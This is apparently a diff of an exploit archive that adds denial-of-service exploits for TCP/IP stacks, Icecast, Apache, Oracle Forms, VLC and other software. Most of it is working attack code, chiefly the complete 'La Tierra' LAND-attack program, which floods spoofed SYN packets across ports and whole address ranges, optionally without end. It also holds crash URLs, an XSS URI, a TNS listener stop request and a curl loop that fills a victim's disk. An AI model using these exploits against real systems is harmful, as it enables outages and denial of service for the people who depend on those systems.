eth_hdr->ether_dhost[2] = eth_hdr->ether_shost[2] = sa->sin6_addr.u.Byte[10];
eth_hdr->ether_dhost[3] = eth_hdr->ether_shost[3] = sa->sin6_addr.u.Byte[13];
eth_hdr->ether_dhost[4] = eth_hdr->ether_shost[4] = sa->sin6_addr.u.Byte[14];
eth_hdr->ether_dhost[5] = eth_hdr->ether_shost[5] = sa->sin6_addr.u.Byte[15];
eth_hdr->ether_type = 0xdd86;
// fill IP header
// source ip == destination ip
memcpy(ip6_hdr->ip_src.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));
memcpy(ip6_hdr->ip_dst.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));
ip6_hdr->ip_hl = 255;
ip6_hdr->ip_nh = IPPROTO_TCP;
ip6_hdr->ip_len = htons (20);
ip6_hdr->ip_flags[0] = 0x06 << 4;
srand((unsigned int) time(0));
// fill tcp header
tcp_hdr->th_sport = tcp_hdr->th_dport = htons (atoi(argv[3])); // source port equal to destination
tcp_hdr->th_seq = rand();
tcp_hdr->th_ack = rand();
tcp_hdr->th_off = htons(5);
tcp_hdr->th_win = rand();
tcp_hdr->th_sum = 0;
tcp_hdr->th_urp = htons(10);
tcp_hdr->th_off = 5;
tcp_hdr->th_flags = 2;
// calculate tcp checksum
int chsum = libnet_in_cksum ((u_int16_t *) & ip6_hdr->ip_src, 32);
chsum += ntohs (IPPROTO_TCP + sizeof (struct libnet_tcp_hdr));
chsum += libnet_in_cksum ((u_int16_t *) tcp_hdr, sizeof (struct libnet_tcp_hdr));
tcp_hdr->th_sum = LIBNET_CKSUM_CARRY (chsum);
// send data to wire
retVal = pcap_sendpacket (pcap_handle, (u_char *) packet, sizeof(packet));
if ( retVal == -1 )
{
fprintf(stderr,"Error writing packet to wire!!\n");
}
//
// close adapter, free mem.. etc..
//
pcap_close(pcap_handle);
freeaddrinfo(addrinfo);
WSACleanup();
return EXIT_SUCCESS;
}
--
NTBugtraq Editor's Note:
Most viruses these days use spoofed email addresses. As such, using an Anti-Virus product which automatically notifies the perceived sender of a message it believes is infected may well cause more harm than good. Someone who did not actually send you a virus may receive the notification and scramble their support staff to find an infection which never existed in the first place. Suggest such notifications be disabled by whomever is responsible for your AV, or at least that the idea is considered.
--

852
platforms/multiple/dos/20813.c Executable file
View file

@ -0,0 +1,852 @@
source: http://www.securityfocus.com/bid/2666/info
A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible.
/**************************************************************/
/* */
/* La Tierra v1.0b - by MondoMan (KeG), elmondo@usa.net */
/* */
/* Modified version of land.c by m3lt, FLC */
/* */
/* Compiled on RedHat Linux 2.0.27, Intel Pentium 200Mhz */
/* gcc version 2.7.2.1 tabs set to 3 */
/* */
/* gcc latierra.c -o latierra */
/* */
/* Refer to readme.txt for more details and history */
/* */
/**************************************************************/
#include <stdio.h>
#include <getopt.h>
#include <string.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>
#define DEFAULT_FREQUENCY 1
#define TRUE 1
#define FALSE 0
#define FOR_EVER -5
#define LIST_FILE 1
#define ZONE_FILE 2
#define MAXLINELENGTH 512
#define DEFAULT_SEQ 0xF1C
#define DEFAULT_TTL 0xFF
#define DEFAULT_TCPFLAGS (TH_SYN | TH_PUSH)
#define DEFAULT_WINSIZE 0xFDE8
struct pseudohdr
{
struct in_addr saddr;
struct in_addr daddr;
u_char zero;
u_char protocol;
u_short length;
struct tcphdr tcpheader;
};
typedef struct latierra_data
{
char dest_ip[256];
int tcp_flags;
int window_size;
int ip_protocol;
int sequence_number;
int ttl;
int supress_output;
int message_type;
} LATIERRA_DATA;
void alternatives(void);
int get_ip(int use_file, FILE *fp, char *buff);
int land(LATIERRA_DATA *ld, int port_number);
void nslookup_help(void);
void print_arguments(void);
void protocol_list(void);
/********/
/* main */
/********/
int main(int argc, char **argv)
{
FILE *fp;
LATIERRA_DATA ld;
int frequency = DEFAULT_FREQUENCY, x;
int beginning_port=1, octet=1, scan_loop=0, loop_val=0, use_file=FALSE;
int ending_port = 0, loop = TRUE, i = 0, increment_addr = FALSE;
char got_ip = FALSE, got_beg_port = FALSE;
char class_c_addr[21], filename[256], buff[512], valid_tcp_flags[16];
printf("\nlatierra v1.0b by MondoMan (elmondo@usa.net), KeG\n");
printf("Enhanced version of land.c originally developed by m3lt, FLC\n");
strcpy(valid_tcp_flags, "fsrpau");
ld.tcp_flags = 0;
ld.window_size = DEFAULT_WINSIZE;
ld.ip_protocol = IP_TCP;
ld.sequence_number = DEFAULT_SEQ;
ld.ttl = DEFAULT_TTL;
ld.message_type = 0;
if(argc > 1 && (!strcmp(argv[1], "-a")))
alternatives();
if(argc > 1 && (!strcmp(argv[1], "-n")))
nslookup_help();
if(argc > 1 && (!strcmp(argv[1], "-p")))
protocol_list();
if(argc == 1 || ( (argc >= 2) && (!strcmp(argv[1], "-h"))))
print_arguments();
while((i = getopt(argc, argv, "i:b:e:s:l:o:t:w:p:q:v:m:")) != EOF)
{
switch(i)
{
case 't':
for(x=0;x<strlen(optarg);x++)
switch(optarg[x])
{
case 'f': /* fin */
ld.tcp_flags |= TH_FIN;
break;
case 's': /* syn */
ld.tcp_flags |= TH_SYN;
break;
case 'r': /* reset */
ld.tcp_flags |= TH_RST;
break;
case 'p': /* push */
ld.tcp_flags |= TH_PUSH;
break;
case 'a': /* ack */
ld.tcp_flags |= TH_ACK;
break;
case 'u': /* urgent */
ld.tcp_flags |= TH_URG;
break;
default:
printf("\nERROR: Invalid option specified [ %c ] for tcp_flags.\n\n", optarg[x]);
return(-12);
break;
}
break;
case 'q':
ld.sequence_number = atoi(optarg);
break;
case 'w':
ld.window_size = atoi(optarg);
break;
case 'm':
ld.message_type = atoi(optarg);
break;
case 'v':
ld.ttl = atoi(optarg);
break;
case 'p':
ld.ip_protocol = atoi(optarg);
break;
case 'o':
ld.supress_output = TRUE;
break;
case 'i':
if(strlen(optarg) > 1)
strcpy(ld.dest_ip, optarg);
else
{
printf("ERROR: Must specify valid IP or hostname.\n");
return(-6);
}
got_ip = TRUE;
break;
case 's':
frequency = atoi(optarg);
break;
case 'l':
loop = atoi(optarg);
break;
case 'b':
beginning_port = atoi(optarg);
got_beg_port = TRUE;
break;
case 'e':
ending_port = atoi(optarg);
break;
}
}
if(!ld.tcp_flags)
ld.tcp_flags = DEFAULT_TCPFLAGS;
if(!got_beg_port)
{
fprintf(stderr, "\nMust specify beginning port number. Use -h for help with arguments.\n\n");
return(-7);
}
if(ending_port == 0)
ending_port = beginning_port;
printf("\nSettings:\n\n");
printf(" (-i) Dest. IP Addr : ");
if(ld.dest_ip[strlen(ld.dest_ip) -1] == '-')
{
ld.dest_ip[strlen(ld.dest_ip)-1] = 0x0;
strcpy(class_c_addr, ld.dest_ip);
strcat(ld.dest_ip, "1");
printf(" %s (Class C range specified).\n", ld.dest_ip);
increment_addr = TRUE;
octet = 1;
}
else
if(strlen(ld.dest_ip) > 5)
{
if(strncmp(ld.dest_ip, "zone=", 5)==0)
{
strcpy(filename, &ld.dest_ip[5]);
printf("%s (using DNS zone file)\n", filename);
use_file = ZONE_FILE;
}
else if(strncmp(ld.dest_ip, "list=", 5) == 0)
{
strcpy(filename, &ld.dest_ip[5]);
printf("%s (using ASCII list)\n", filename);
use_file = LIST_FILE;
}
else
printf("%s\n", ld.dest_ip);
}
else
{
printf("Destination specifier (%s) length must be > 7.\n", ld.dest_ip);
return(-9);
}
printf(" (-b) Beginning Port #: %d\n", beginning_port );
printf(" (-e) Ending Port # : %d\n", ending_port );
printf(" (-s) Seconds to Pause: %d\n", frequency );
printf(" (-l) Loop : %d %s\n", loop, (loop == FOR_EVER) ? "(forever)" : " " );
printf(" (-w) Window size : %d\n", ld.window_size );
printf(" (-q) Sequence Number : %X (%d)\n",ld.sequence_number, ld.sequence_number );
printf(" (-v) Time-to-Live : %d\n", ld.ttl);
printf(" (-p) IP Protocol # : %d\n", ld.ip_protocol );
printf(" (-t) TCP flags : ");
strcpy(buff, "");
if( ld.tcp_flags & TH_FIN)
strcat(buff, "fin ");
if( ld.tcp_flags & TH_SYN)
strcat(buff, "syn ");
if(ld.tcp_flags & TH_RST)
strcat(buff, "rst ");
if(ld.tcp_flags & TH_PUSH)
strcat(buff, "push ");
if(ld.tcp_flags & TH_ACK)
strcat(buff, "ack ");
if(ld.tcp_flags & TH_URG)
strcat(buff, "urg ");
printf("%s\n\n", buff);
if(ending_port < beginning_port)
{
printf("\nERROR: Ending port # must be greater than beginning port #\n\n");
return(-8);
}
scan_loop = loop_val = loop;
if(use_file)
{
if(access(filename, 0))
{
printf("\nERROR: The file you specified (%s) cannot be found.\n\n", filename);
return(-9);
}
if( (fp = fopen(filename, "rt")) == NULL)
{
printf("ERROR: Unable to open %s.\n", filename);
return(-10);
}
if(!get_ip(use_file, fp, buff))
{
printf("Unable to get any IP address from file %s.\n");
return(-11);
}
strcpy(ld.dest_ip, buff);
}
while( (loop == FOR_EVER) ? 1 : loop-- > 0)
{
for(i=beginning_port; i <= ending_port; i++)
{
if(land(&ld, i)) /* go for it BaBy! */
break;
if(frequency) /* make sure freq > 0 */
{
if(!ld.supress_output)
printf("-> paused %d seconds.\n", frequency);
sleep(frequency);
}
}
if( (!use_file) && (loop && increment_addr) )
{
char temp_addr[21];
if(++octet > 254) /* check for reset */
{
if(loop_val != FOR_EVER) /* make sure not to distrute forever! */
{
if(++scan_loop > loop_val) /* check if scanned x times */
break;
else
loop = loop_val; /* restore original value */
}
octet = 1; /* reset */
}
sprintf(temp_addr, "%s%d", class_c_addr, octet);
strcpy(ld.dest_ip, temp_addr);
if(!ld.supress_output)
printf("** incrementing to next IP address: %s\n", ld.dest_ip);
if(scan_loop > loop_val)
break; /* break while loop */
}
else if(use_file)
{
if(!get_ip(use_file, fp, buff))
break;
loop++;
strcpy(ld.dest_ip, buff);
}
} /* end while */
printf("\nDone.\n\n");
} /* end main */
int get_ip(int use_file, FILE *fp, char *buff)
{
if(use_file == LIST_FILE)
return(get_ip_from_list(fp, buff));
return(get_ip_from_zone(fp, buff));
}
int get_ip_from_list(FILE *fp, char *buff)
{
int ret_val;
while(1)
{
ret_val = (int)fgets(buff, MAXLINELENGTH, fp);
if((ret_val == EOF) || (ret_val == (int)NULL))
return 0;
if( strlen(buff) >= 7)
if((buff[0] != ';') && (buff[0] != '['))
{
if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
buff[strlen(buff)-1] = 0x0;
return 1;
}
}
return 0;
}
int get_ip_from_zone(FILE *fp, char *buff)
{
int ret_val, i;
char *p, delim[8];
strcpy(delim, " \t");
while(1)
{
ret_val = (int)fgets(buff, MAXLINELENGTH, fp);
if((ret_val == EOF) || (ret_val == (int)NULL))
return 0;
if( strlen(buff) >= 7)
if((buff[0] != ';') && (buff[0] != '[') && (strncmp(buff, "ls -d", 5) != 0))
{
if( (p = strtok( buff, delim)) == NULL)
continue;
if( (p = strtok(NULL, delim)) == NULL)
continue;
if(strcmp(p, "A")) /* be sure second column is an DNS A record */
continue;
if( (p = strtok(NULL, delim)) == NULL)
continue;
strcpy(buff, p);
/* verify that we have a valid IP address to work with */
if(inet_addr(p) == -1)
continue;
/* strip off training line characters */
if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
buff[strlen(buff)-1] = 0x0;
return 1;
}
}
return 0;
}
/************/
/* checksum */
/************/
u_short checksum(u_short * data,u_short length)
{
register long value;
u_short i;
for(i = 0; i< (length >> 1); i++)
value += data[i];
if((length & 1)==1)
value += (data[i] << 8);
value = (value & 0xFFFF) + (value >> 16);
return(~value);
}
/********/
/* land */
/********/
int land(LATIERRA_DATA *ld, int port_number)
{
struct sockaddr_in sin;
int sock;
char buffer[40];
struct iphdr * ipheader = (struct iphdr *) buffer;
struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
struct pseudohdr pseudoheader;
bzero(&sin,sizeof(struct sockaddr_in));
sin.sin_family=AF_INET;
if((sin.sin_addr.s_addr=inet_addr(ld->dest_ip))==-1)
{
printf("ERROR: unknown host %s\n", ld->dest_ip);
return(-1);
}
if((sin.sin_port=htons(port_number))==0)
{
printf("ERROR: unknown port %s\n",port_number);
return(-2);
}
if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
{
printf("ERROR: couldn't allocate raw socket\n");
return(-3);
}
bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->version=4;
ipheader->ihl=sizeof(struct iphdr)/4;
ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->id=htons(ld->sequence_number);
ipheader->ttl = ld->ttl;
ipheader->protocol = ld->ip_protocol;
ipheader->saddr=sin.sin_addr.s_addr;
ipheader->daddr=sin.sin_addr.s_addr;
tcpheader->th_sport = sin.sin_port;
tcpheader->th_dport = sin.sin_port;
tcpheader->th_seq = htonl(ld->sequence_number);
tcpheader->th_flags = ld->tcp_flags;
tcpheader->th_off = sizeof(struct tcphdr)/4;
tcpheader->th_win = htons(ld->window_size);
bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.protocol = ld->ip_protocol;
pseudoheader.length = htons(sizeof(struct tcphdr));
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
tcpheader->th_sum = checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
if( sendto(sock, buffer,
sizeof(struct iphdr)+sizeof(struct tcphdr),
ld->message_type,
(struct sockaddr *) &sin,
sizeof(struct sockaddr_in) )==-1)
{
printf("ERROR: can't send packet. (sendto failed)\n");
return(-4);
}
if(!ld->supress_output)
printf("-> packet successfully sent to: %s:%d\n", ld->dest_ip, port_number);
close(sock);
return(0);
}
/* End of land */
void alternatives()
{
printf("\nAlternative command line arguments for option -i\n\n");
printf(" You can create two types of files that latierra can use to get\n");
printf(" a list of IP addresses, a simple ASCII file with each IP address\n");
printf(" appearing on each line or better yet, a DNS zone file created by\n");
printf(" nslookup. If you are unfamiliar with nslookup, specify a '-n' on the\n");
printf(" command line of latierra.\n\n");
printf(" Basically, latierra will walk down the list and send the spoofed packet\n");
printf(" to each IP address. Once the list is complete, and loop > 1, the list\n");
printf(" is repeated. To specify that the '-i' option should use a zone file,\n");
printf(" specify \"zone=filename.txt\" instead of an IP address. To specify a \n");
printf(" simple ASCII list of IP addresses, use \"list=filename.txt\". Lines\n");
printf(" beginning with ';' or '[' are ignored. Lines that are not an 'A' \n");
printf(" record (second column)in a zone file will ignored.\n\n");
exit(-1);
}
void nslookup_help()
{
printf("\nNSLOOKUP help\n\n");
printf("To see who is the DNS server for a particular domain, issue the following:\n");
printf(" > set type=ns\n");
printf(" > xyz.com\n\n");
printf(" You will see a list of the name server(s) if completed successfully\n\n");
printf("To get a list of all the DNS entries for a particular domain, run nslookup\n");
printf("and issue the following commands:\n");
printf(" > server 1.1.1.1\n");
printf(" > ls -d xyz.com > filename.txt\n\n");
printf("Line 1 sets the server that nslookup will use to resolve a name.\n");
printf("Line 2 requires all the information about xyz.com be written to filename.txt\n\n");
exit(-1);
}
void protocol_list()
{
printf("\nProtocol List:\n\n");
printf("Verified:\n");
printf("1-ICMP 2-IGMP 3-GGP 5-ST 6-TCP 7-UCL 8-EGP 9-IGP 10-BBN_RCC_MON\n");
printf("11-NVP11 13-ARGUS 14-EMCON 15-XNET 16-CHAOS 17-UDP 18-MUX\n");
printf("19-DCN_MEAS 20-HMP 21-PRM 22-XNS_IDP 23-TRUNK1 24-TRUNK2\n");
printf("25-LEAF1 26-LEAF2 27-RDP 28-IRTP 29-ISO_TP4 30-NETBLT\n");
printf("31-MFE_NSP 32-MERIT_INP 33-SEP 34-3PC 62-CFTP 64-SAT_EXPAK\n");
printf("66-RVD 67-IPPC 69-SAT_MON 70-VISA 71-IPCV\n");
printf("76-BR_SAT_MON 77-SUN_ND 78-WB_MON 79-WB_EXPAK 80-ISO_IP\n");
printf("81-VMTP 82-SECURE_VMTP 83-VINES 84-TTP 85-NSFNET_IGP 86-DGP\n");
printf("87-TCF 88-IGRP 89-OSPFIGP 90-SPRITE_RPG 91-LARP\n\n");
printf("Supported:\n");
printf(" 6-TCP 17-UDP (future: PPTP, SKIP) \n\n");
exit(-1);
}
void print_arguments()
{
printf("Arguments: \n");
printf(" * -i dest_ip = destination ip address such as 1.1.1.1\n");
printf(" If last octet is '-', then the address will increment\n");
printf(" from 1 to 254 (Class C) on the next loop\n");
printf(" and loop must be > 1 or %d (forever).\n", FOR_EVER);
printf(" Alternatives = zone=filename.txt or list=filename.txt (ASCII)\n");
printf(" For list of alternative options, use -a instead of -h.\n");
printf(" * -b port# = beginning port number (required).\n");
printf(" -e port# = ending port number (optional)\n");
printf(" -t = tcp flag options (f=fin,~s=syn,r=reset,~p=push,a=ack,u=urgent)\n");
printf(" -v = time_to_live value, default=%d\n", DEFAULT_TTL);
printf(" -p protocol = ~6=tcp, 17=udp, use -p option for complete list\n");
printf(" -w window_size = value from 0 to ?, default=%d\n", DEFAULT_WINSIZE);
printf(" -q tcp_sequence_number, default=%d\n", DEFAULT_SEQ);
printf(" -m message_type (~0=none,1=Out-Of-Band,4=Msg_DontRoute\n");
printf(" -s seconds = delay between port numbers, default=%d\n", DEFAULT_FREQUENCY);
printf(" -o 1 = supress additional output to screen, default=0\n" );
printf(" -l loop = times to loop through ports/scan, default=%d, %d=forever\n", 1, FOR_EVER);
printf(" * = required ~ = default parameter values\n\n");
exit(-1);
}
/* End of file */
----------------- readme.txt ------------------------------
La Tierra v1.0b - by MondoMan (KeG), elmondo@usa.net
Modified version of land.c by m3lt, FLC
To compile latierra, type:
gcc latierra.c -o latierra
To see the help screen, use 'latierra -h'
This program crashes Windows 95, and will cause Windows NT
4.0, SP3 to utilize a high percentage of CPU. In some
instances, CPU usage reaches %100.
land.c description:
land.c sends a spoofed packet with the SYN flag from the
the same IP and port number as the destination. For
example, if you want to do a DoS on 1.1.1.1, port 80, it would
spoof 1.1.1.1 port 80 as the source. The problem is with
NT4 SP3, however, is once you issue this packet to a
port, NT4 SP3 appears to ignore all other attempts -
UNTIL ...
La Tierra!
La Tierra description:
La Tierra basically works by sending NT the same packet
used in land.c but to more than one port (if specified).
It doesn't appear to matter if the port is opened or closed!
NT doesn't appear to let this happen again on the same port
successively, but you simply change ports, and you can easily
go back to the original port and it'll work again. What's even
more interesting is the fact that port 139 works with this.
You would have thought - I'll leave that alone for now!
While testing, I used a Compaq dual Intel Pentium Pro 200, and
was able to take up to %64 CPU. With one processor disabled,
CPU usage was %100. NT4 SP3 doesn't seem to crash, just needs
time to recover, even with one spoofed packet.
Features include:
- Ability to launch a DoS on an entire class C address
- Specify the beginning and ending port range
- Specify the number of loops or make it loop forever!
- User defined TCP flags: fin, syn, reset, push, ack,
and urgent
- Other IP options such as window size, time-to-live,
sequence_number, and message_type
- Ability to read a DNS zone file for IP addresses
- Ability to read a ASCII file containing IP addresses
Command line options:
- i ip_address
DEFAULT: None
RANGE: Valid IP Address
OPTIONAL: No
where ip_address is a valid ip_address, or if you wish to
cycle through a class C address, the last octet is dropped
and replaced with a '-'. This option is required. The
source and destination address are obtained from this value.
Rather than specifying an IP address, you may wish to create
an ASCII file, or better yet, use nslookup to obtain all
zone information for a particular domain. The ASCII file
simply contains a list of IP addresses, one on each line.
To get a DNS file, simply use nslookup, and the
"ls -d somedomain.com > filename.txt" command. You can use
'latierra -n' to read more about the command sequence for
nslookup.
In both types of files, lines that begin with ';' or '[' are
ignored. In DNS files, only 'A' records are processed.
Examples:
Single IP Address:
-i 10.1.2.1
Class C range:
-i 10.1.2.-
ASCII file:
-i list=filename.txt
DNS file:
-i zone=filename.txt
-b beginning_port_number
DEFAULT: None
RANGE: Positive Integer
OPTIONAL: No
where this value is the port_number that latierra will use. If
no ending_port_number is specified, ending_port_number is then
equal to this value. Valid range is 1 to 0xFFFF
-e ending_port_number
DEFAULT: If not specified, equal to beginning_port_number
RANGE: Positive Integer
OPTIONAL: Yes
is the highest port number in the range to cycle through.
Example:
-i 10.1.2.1 -b 23 -e 80
will start at port 23 and increment up to port 80. You can
delay the next increment by using the -s option. Valid range
is 1 to 0xFFFF
-s seconds_between_spoofs
DEFAULT: 1
RANGE: Positive Integer
OPTIONAL: Yes
You may want to control the seconds between spoofs. If you
specify a zero, no delays occur.
In the below example, the spoof will between ports 23 and 80,
every 3 seconds.
-i 10.1.2.1 -b 23 -e 80 -s 3
-l number_of_loops
DEFAULT: 1
RANGE: Positive Integer, -5 loops forever
OPTIONAL: Yes
This option if set greater than 1, will cause a repeat of the
cycle. For example:
-i 10.1.2.1 -b 23 -e 80 -s 0 -l 8
will cause latierra to go through ports 23 through 80 and
repeat the process 8 times, with no delay. Look at the
following example:
-i 10.1.2.- -b 23 -e 80 -s 0 -l 8
latierra will start at 10.1.2.1, port 23 through 80, then
increment to 10.1.2.2, port 23 through 80, and so on until
it gets to 10.1.2.254, in which case it will repeat the
same procedure over again 8 times.
By specifying a value of -5 for this option, latierra will
loop forever, until you manually stop the process. In the
last example above, the procedure would never end. When it
reaches 10.1.2.254, it falls back to 10.1.2.1 and start
over again from there.
Other examples:
-i 10.1.2.1 -b 139 -s 0 -l -5
-i 10.1.2.- -b 80 -s 5 -l 10
-t tcp_flags
DEFAULT: sp (SYN, PUSH)
RANGE: valid character set (see below)
OPTIONAL: Yes
this option sets the various TCP flags, which include:
f = fin s = syn r = reset
p = push a = ack u = urgent
Example:
-i 10.1.2.1 -b 139 -t apu -s 0
To set the ack, push, and urgent flag
-v time_to_live_value
DEFAULT: 0xFF (255 decimal)
RANGE: Positive Integer
OPTIONAL: Yes
Sets the time to live value.
-p protocol_value
DEFAULT: 6 (tcp)
RANGE: Positive Integer
OPTIONAL: Yes
Sets the protocol value in the IP header. To see a list of
available protocols, run "latierra -p".
-w window_size_value
DEFAULT: 0xFFFF (65000 decimal)
RANGE: Positive long value
OPTIONAL: Yes
-q tcp_sequence_number_value
DEFAULT: 0xF1C
RANGE: Positive integer
OPTIONAL: Yes
-o 1 supress_additional_output
DEFAULT: messages are printed for status
RANGE: None
OPTIONAL: Yes
If you don't want to see the messages during the process,
simply use this "-o 1" to turn them off.
Final Note:
Please use this program for in-house testing purposes only.
Just because your sending spoofed packets, doesn't mean you
can't be traced.
Good luck.
- MondoMan
elmondo@usa.net
-------------------- end of file -------------------------------

9
platforms/multiple/dos/20973.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/2933/info
Icecast is an open source audio-streaming server for both Unix and Microsoft Windows systems.
Icecast does not sufficiently sanitize user-supplied input, or sanely handle unexpected input. Upon receiving a request from a user for a file that ends with a slash or period, the server will crash. The behaviour occurs when the remote attacker adds an '/', '\' or '.' to the end the URL they craft to request the file. The request of an existing file is not necessary, as the Icecast server will fail regardless.
http://localhost:8000/file//
NOTE: File is interpreted by Icecast as the 'root' directory and anything after 'file/' indicates the file request. The character '/' triggers the denial of service.

5
platforms/multiple/dos/22505.txt Executable file
View file

@ -0,0 +1,5 @@
source: http://www.securityfocus.com/bid/7375/info
A vulnerability has been reported for the mod_access_referer Apache module. The problem occurs when parsing invalid HTTP referer header fields. If this vulnerability were to be triggered, it may be possible to trigger a NULL pointer dereference, effectively causing Apache to segfault.
Referer: ://its-missing-http.com

9
platforms/multiple/dos/23231.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/8787/info
It has been reported that Medieval Total War may be prone to a denial of service vulnerability. The issue is caused when an attacker sends a malformed value for nickname consisting of 0 Unicode characters to the server during the initial authentication process. The exploitation of this issue results in the all users receiving a "Connection expired" message before leading to a crash of the server.
Successful exploitation of this issue may allow an attacker to cause the software to crash or hang.
Medieval Total War versions 1.1 and prior are reported to be prone to this vulnerability.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23231.zip

7
platforms/multiple/dos/24305.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/10782/info
It is reported that VPOP3 is reported prone to a remote denial of service vulnerability. This issue presents itself when an attacker issues a URI request containing a large value for the 'msglistlen' parameter to the web mail interface.
VPOP3 2.0.0k is reported prone to this issue, however, it is likely that other versions are affected as well.
http://www.example.com:5108/messagelist.html?auth=MDA4MDA2MTQ6MTI3LjAuMC4xOmRpbWl0cmlz&msgliststart=0&msglistlen=10&sortfield=date&sortorder=A

11
platforms/multiple/dos/24610.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/11213/info
DNS4Me is reported to be susceptible to a denial of service vulnerability, and a cross-site scripting vulnerability. These vulnerabilities affect the built-in web server contained in the package.
The first vulnerability reportedly allows attackers to cause the web server to consume all available CPU resources, and eventually crash the application.
The second vulnerability is due to a failure of the application to properly sanitize user-supplied URI input. This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks.
Although these vulnerabilities are reported to exist in version 3.0.0.4 of DNS4Me, other versions may also be affected.
http://www.example.com/?%3E%3Cscript%3Ealert('XSS')%3C/script%3E

7
platforms/multiple/dos/25692.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/13712/info
Warrior Kings: Battles is susceptible to a remote denial of service vulnerability. This is due to a failure of the game server to properly handle exceptional conditions.
This vulnerability allows remote attackers to crash affected game servers, denying access to legitimate users.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25692.zip

11
platforms/multiple/dos/26336.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/15039/info
Oracle Forms is susceptible to a vulnerability that allows remote attackers to stop the TNS Listener service, denying further database service to legitimate users.
By issuing a specific HTTP request, remote attackers may cause the affected application to stop the TNS Listener.
This issue was reported in Oracle Forms versions prior to July 2005.
This issue was originally described and addressed in Oracle Critical Patch Update - July 2005, BID 14238 (Oracle July Security Update Multiple Vulnerabilities). Due to the availability of more information, this issue is being assigned a separate BID.
http://www.example.com:8888/forms90/f90servlet?form=test.fmx&userid=SCOTT/TIGER@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=server)(PORT=1521)))(CONNECT_DATA=(COMMAND=STOP)(SERVICE=LISTENER)))&buffer_records=NO&debug_messages=NO&array=YES&query_only=NO&quiet=NO&RENDER=YES

9
platforms/multiple/dos/32362.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31140/info
Unreal Engine is prone to a remote denial-of-service vulnerability because of an error in memory allocation.
An attacker could exploit this issue to crash applications that use the vulnerable engine and deny service to legitimate users.
This issue affects Unreal Engine 3; other versions may also be affected.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32362.zip

38
platforms/multiple/dos/35339.txt Executable file
View file

@ -0,0 +1,38 @@
# Exploit Title: JourneyMap Disk-space consumption exploit
# Date: 23Nov2014
# Exploit Author: CovertCodes
# Vendor Homepage: http://journeymap.techbrew.net/
# Software Link: http://journeymap.techbrew.net/download/
# Version: 5.0.0RC2 Ultimate Edition
# Tested on: Linux
JourneyMap (http://journeymap.techbrew.net/) is a mapping mod for
Minecraft. It comes included with some modpacks, and is enabled by
default in the popular Feed the Beast client. JourneyMap opens a web
server on the client which is configured to listen on port 8080. When
the client is running, a remote, unauthenticated user can have
JourneyMap save a screenshot of the game to the hard drive by accessing
a specific URL, consuming hard drive space. Here's an example:
#!/bin/bash
while true;
do
curl -o /dev/null 192.168.1.1:8080/action?type=savemap&mapType=day
done
This works even when the client has paused the game (by pressing
escape.) We include mapType=day because the software should refuse to
save a screenshot if the client user is underground, and the game is set
on hardcore mode.
Accessing the URL and triggering a screenshot will display a message
on the client's screen, which may somewhat lessen the severity of this
exploit. Further, it takes a long time to fill up disk using this
technique. JourneyMap allows depth and resolution to be specified in
the URL as well, though a few simple tests showed no change despite
altering these parameters. If one were able to increase the depth and
resolution of the image, the drive would fill up faster.
Tested with JourneyMap 5.0.0RC2 Ultimate Edition, but presumed to
work on other versions as well.

58
platforms/multiple/dos/35465.pl Executable file
View file

@ -0,0 +1,58 @@
source: http://www.securityfocus.com/bid/46868/info
VLC Media Player is prone to a denial-of-service vulnerability.
Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
VLC Media Player 1.0.5 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
###
# Title : VLC media player v1.0.5 (.ape) Local Crash PoC
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : VLC media player Just Crashed
# Tested on : Windows XP SP3 Fran<61>ais
# Target : VLC media player v1.0.5
###
